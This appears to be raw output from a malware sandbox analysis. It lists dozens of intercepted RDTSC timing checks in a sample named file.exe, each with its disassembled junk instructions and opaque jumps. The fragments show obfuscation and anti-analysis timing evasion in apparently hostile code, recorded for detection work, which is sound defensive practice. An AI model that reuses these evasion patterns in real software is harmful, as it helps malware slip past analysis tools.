                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC229B second address: EC22A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC221A94B26h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC22A8 second address: EC22AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC22AE second address: EC22B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFA4D second address: EAFA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFA51 second address: EAFA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFA5B second address: EAFA87 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f jo 00007FC220745E0Dh 0x00000015 jne 00007FC220745DF6h 0x0000001b jmp 00007FC220745E01h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFA87 second address: EAFAA1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B34h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAFAA1 second address: EAFAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC198B second address: EC198F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC1C25 second address: EC1C4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5635 second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jns 00007FC221A94B40h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jnp 00007FC221A94B3Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jg 00007FC221A94B47h 0x00000022 pop eax 0x00000023 stc 0x00000024 push dword ptr [ebp+122D04E9h] 0x0000002a jmp 00007FC221A94B37h 0x0000002f call dword ptr [ebp+122D2819h] 0x00000035 pushad 0x00000036 jmp 00007FC221A94B37h 0x0000003b xor eax, eax 0x0000003d jmp 00007FC221A94B34h 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 stc 0x00000047 sub dword ptr [ebp+122D2F78h], edi 0x0000004d mov dword ptr [ebp+122D2B56h], eax 0x00000053 jmp 00007FC221A94B2Eh 0x00000058 mov esi, 0000003Ch 0x0000005d mov dword ptr [ebp+122D19E9h], edi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 jno 00007FC221A94B2Ch 0x0000006d lodsw 0x0000006f pushad 0x00000070 jnl 00007FC221A94B2Ch 0x00000076 mov ecx, dword ptr [ebp+122D2B16h] 0x0000007c popad 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D1B69h], edx 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b clc 0x0000008c nop 0x0000008d push eax 0x0000008e push edx 0x0000008f jnp 00007FC221A94B3Eh 0x00000095 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC57C9 second address: EC57E3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC220745DFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC57E3 second address: EC5810 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC221A94B37h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5810 second address: EC584A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC220745DFCh 0x00000008 jnc 00007FC220745DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 sbb dx, 9FCDh 0x00000016 lea ebx, dword ptr [ebp+12447547h] 0x0000001c mov ecx, dword ptr [ebp+122D2BB2h] 0x00000022 sub ecx, dword ptr [ebp+122D1FF1h] 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC220745DFFh 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC584A second address: EC5854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC221A94B26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC58A7 second address: EC58D8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC220745DF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb edi, 62603C2Ch 0x00000013 jne 00007FC220745DFCh 0x00000019 push 00000000h 0x0000001b movsx ecx, cx 0x0000001e push A55982BEh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC58D8 second address: EC58DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC58DC second address: EC58F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A12 second address: EC5A1F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5A1F second address: EC5A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B74 second address: EC5B83 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B83 second address: EC5B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FC220745DF8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC5B97 second address: EC5BD4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC221A94B28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d add ecx, dword ptr [ebp+122D2525h] 0x00000013 lea ebx, dword ptr [ebp+1244755Bh] 0x00000019 jbe 00007FC221A94B2Ch 0x0000001f mov dword ptr [ebp+122D1B75h], edx 0x00000025 xchg eax, ebx 0x00000026 pushad 0x00000027 push esi 0x00000028 jmp 00007FC221A94B30h 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2E13 second address: EB2E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFAh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FC220745DFCh 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2E34 second address: EB2E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esi 0x00000007 pushad 0x00000008 je 00007FC221A94B26h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FC221A94B2Ah 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2E55 second address: EB2E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3445 second address: EE346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC221A94B36h 0x0000000c js 00007FC221A94B34h 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE35BD second address: EE35D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007FC220745DFBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3728 second address: EE3751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FC221A94B2Eh 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3751 second address: EE3755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3755 second address: EE3780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FC221A94B26h 0x00000010 jmp 00007FC221A94B30h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3780 second address: EE37A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC220745E09h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3901 second address: EE390C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE390C second address: EE3912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3912 second address: EE3916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3916 second address: EE3933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A90 second address: EE3AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC221A94B32h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3AA9 second address: EE3AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3AB1 second address: EE3AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3AB7 second address: EE3ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC220745E06h 0x0000000f jns 00007FC220745DF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3C36 second address: EE3C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC221A94B34h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3DA9 second address: EE3DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED8A09 second address: ED8A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB487A second address: EB487E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4FD1 second address: EE4FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B36h 0x00000009 jno 00007FC221A94B26h 0x0000000f popad 0x00000010 push ecx 0x00000011 jno 00007FC221A94B26h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE52D9 second address: EE52DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE52DD second address: EE52E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCF93 second address: EBCF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCF97 second address: EBCFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FC221A94B32h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCFA5 second address: EBCFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCFAB second address: EBCFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBCFAF second address: EBCFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9778 second address: EE9787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC221A94B26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9787 second address: EE978B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE978B second address: EE97C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC221A94B32h 0x0000000e pop edx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jp 00007FC221A94B30h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE97C3 second address: EE97C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE97C7 second address: EE97D1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE880F second address: EE8813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBA6 second address: EEBBAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBAC second address: EEBBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBB0 second address: EEBBC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEBBC4 second address: EEBBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745E04h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE30 second address: EADE47 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC221A94B26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007FC221A94B26h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE47 second address: EADE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE4C second address: EADE6D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC221A94B2Fh 0x00000008 jbe 00007FC221A94B26h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EADE6D second address: EADE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF806 second address: EEF811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC221A94B26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEF811 second address: EEF817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7D99 second address: EB7DAE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC221A94B26h 0x00000008 jmp 00007FC221A94B2Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7DAE second address: EB7DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC220745DFCh 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FC220745DFEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2466 second address: EF247F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FC221A94B26h 0x0000000d jmp 00007FC221A94B2Bh 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF247F second address: EF2485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2485 second address: EF24C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e ja 00007FC221A94B2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FC221A94B26h 0x0000001c jmp 00007FC221A94B37h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2BE1 second address: EF2C0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FC220745DF6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2D3E second address: EF2D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jl 00007FC221A94B28h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2ECB second address: EF2EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745E02h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2EE1 second address: EF2EFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC221A94B36h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2EFF second address: EF2F26 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC220745E09h 0x00000008 jg 00007FC220745DF6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2F26 second address: EF2F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF2F2C second address: EF2F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF4C9A second address: EF4CEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 724B437Fh 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC221A94B28h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D2BAEh] 0x00000030 push 21D0469Dh 0x00000035 je 00007FC221A94B34h 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007FC221A94B26h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF530D second address: EF5311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53D1 second address: EF53D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53D6 second address: EF53DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53DC second address: EF53EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b js 00007FC221A94B26h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53EE second address: EF53F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF53F3 second address: EF53F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF58D3 second address: EF58E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov dword ptr [ebp+122D2734h], edi 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
